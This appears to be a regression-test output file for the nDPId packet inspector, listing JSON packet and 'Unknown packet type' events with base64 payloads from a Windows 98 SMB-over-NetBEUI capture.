00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":160,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409899251,"pkt":"AAwp1HmyAFBWM3ieAATw8QEwIwAAAIARtrrAqO+BwKjv\/wCJAIkATG6mAAooEAABAAAAAAABIEZIRVBG"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":160,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409899251,"pkt":"AAwp1HmyAFBWM3ieAATw8QEwIwAAAIARtrrAqO+BwKjv\/wCJAIkATG6mAAooEAABAAAAAAABIEZIRVBG"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":160,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409899293} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":160,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409899293}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":164,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAEvw8DAiDgD\/7xYEAAAAABEAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAgIUAAgAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":164,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAEvw8DAiDgD\/7xYEAAAAABEAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAgIUAAgAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":164,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409903670} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":164,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409903670}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":165,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QEyAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":165,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QEyAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":165,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903670} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":165,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903670}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":166,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieADXw8CIyDgD\/7xYMAAARACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAgAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":166,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieADXw8CIyDgD\/7xYMAAARACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAgAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":166,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903670} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":166,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903670}
00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":167,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAD7w8DIkDgD\/7xYMAAAoABIAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABBAgIUAAAABQAEAAUAAA=="} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":167,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAD7w8DIkDgD\/7xYMAAAoABIAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABBAgIUAAAABQAEAAUAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":167,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409903671} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":167,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409903671}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":168,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE0DgD\/7xYMAAAOACgAAxX\/U01CEAEAAwCAAAAAAAAAAAAAAAAAAAAAyHUF"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":168,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE0DgD\/7xYMAAAOACgAAxX\/U01CEAEAAwCAAAAAAAAAAAAAAAAAAAAAyHUF"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":168,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903671} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":168,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903671}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":169,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieADXw8CQ0DgD\/7xYMAAASACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAABBAgAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":169,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieADXw8CQ0DgD\/7xYMAAASACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAABBAgAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":169,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903671} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":169,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903671}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":170,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAEvw8DQmDgD\/7xYMAAAoABMAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABhAgIUABYAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":170,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAEvw8DQmDgD\/7xYMAAAoABMAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABhAgIUABYAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":170,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409903672} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":170,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409903672}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":171,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE2DgD\/7xeBvAUDABUAAxXvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVF"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":171,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE2DgD\/7xeBvAUDABUAAxXvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVF"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":171,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903672} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":171,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903672}
00580{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":172,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":201,"pkt_type":187,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":201,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieALvw8CY2DgD\/7xYMAAATACgAAxX\/U01CgQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAABhAgEDAIQABYEAgz8\/Pz8\/Pz8\/Pz8\/FgAAAQAAAAAAECpjj08AAAAALgAgICAgICAAAAAAAIM\/Pz8\/Pz8\/Pz8\/PxYBAAEAAAAAABAqY49PAAAAAC4uACAgICAgAAAAAACDPz8\/Pz8\/Pz8\/Pz8WAgABAAAAAAAQyWSPTwAAAABURVNUACAgIAAAAAAA"} 00566{"packet_event_id":1,"packet_event_name":"packet","packet_id":172,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":201,"pkt_type":187,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":201,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieALvw8CY2DgD\/7xYMAAATACgAAxX\/U01CgQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAABhAgEDAIQABYEAgz8\/Pz8\/Pz8\/Pz8\/FgAAAQAAAAAAECpjj08AAAAALgAgICAgICAAAAAAAIM\/Pz8\/Pz8\/Pz8\/PxYBAAEAAAAAABAqY49PAAAAAC4uACAgICAgAAAAAACDPz8\/Pz8\/Pz8\/Pz8WAgABAAAAAAAQyWSPTwAAAABURVNUACAgIAAAAAAA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":172,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":187,"global_ts_msec":1576409903672} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":172,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":187,"global_ts_msec":1576409903672}
00434{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":173,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAFPw8DYoDgD\/7xYMAAAoABQAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAACBAgIUAAAAGgAEAAUVAIM\/Pz8\/Pz8\/Pz8\/PxYCAAEAgwAAAQ=="} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":173,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyAFPw8DYoDgD\/7xYMAAAoABQAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAACBAgIUAAAAGgAEAAUVAIM\/Pz8\/Pz8\/Pz8\/PxYCAAEAgwAAAQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":173,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409903677} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":173,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409903677}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":174,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE4AP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":174,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE4AP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":174,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903677} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":174,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903677}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":175,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieADXw8Cg4DgD\/7xYMAAAUACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAACBAgAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":175,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieADXw8Cg4DgD\/7xYMAAAUACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAACBAgAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":175,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903677} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":175,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903677}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":176,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyADXw8DgqDgD\/7xYMAAAoABUAFQP\/U01CgAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAChAgAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":176,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyADXw8DgqDgD\/7xYMAAAoABUAFQP\/U01CgAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAChAgAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":176,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903679} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":176,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409903679}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":177,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE6AP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":177,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE6AP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":177,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903679} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":177,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903679}
00404{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":178,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":77,"pkt_type":63,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":77,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAD\/w8Co6DgD\/7xYMAAAVACgAAxX\/U01CgAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAChAgVq\/wABAAJ2+AAAAAA="} 00390{"packet_event_id":1,"packet_event_name":"packet","packet_id":178,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":77,"pkt_type":63,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":77,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAD\/w8Co6DgD\/7xYMAAAVACgAAxX\/U01CgAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAChAgVq\/wABAAJ2+AAAAAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":178,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":63,"global_ts_msec":1576409903679} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":178,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":63,"global_ts_msec":1576409903679}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":179,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyABLw8DosDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":179,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AFBWM3ieAAwp1HmyABLw8DosDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":179,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409903737} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":179,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409903737}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":180,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE8AP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":180,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409903041,"pkt":"AAwp1HmyAFBWM3ieAATw8QE8AP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":180,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903738} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":180,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409903738}
00398{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":184,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":60,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":1576409905313,"pkt":"AFBWM3ieAAwp1HmyADzw8DwsDgD\/7xYEAAAAABYAFQP\/U01CAQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADBAgAHAARcVEVTVAA="} 00384{"packet_event_id":1,"packet_event_name":"packet","packet_id":184,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":60,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":1576409905313,"pkt":"AFBWM3ieAAwp1HmyADzw8DwsDgD\/7xYEAAAAABYAFQP\/U01CAQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADBAgAHAARcVEVTVAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":184,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":60,"global_ts_msec":1576409905957} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":184,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":60,"global_ts_msec":1576409905957}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":185,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409905313,"pkt":"AAwp1HmyAFBWM3ieADXw8Cw+DgD\/7xYMAAAWACgAAxX\/U01CAQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAADBAgAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":185,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409905313,"pkt":"AAwp1HmyAFBWM3ieADXw8Cw+DgD\/7xYMAAAWACgAAxX\/U01CAQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAADBAgAAAA=="}
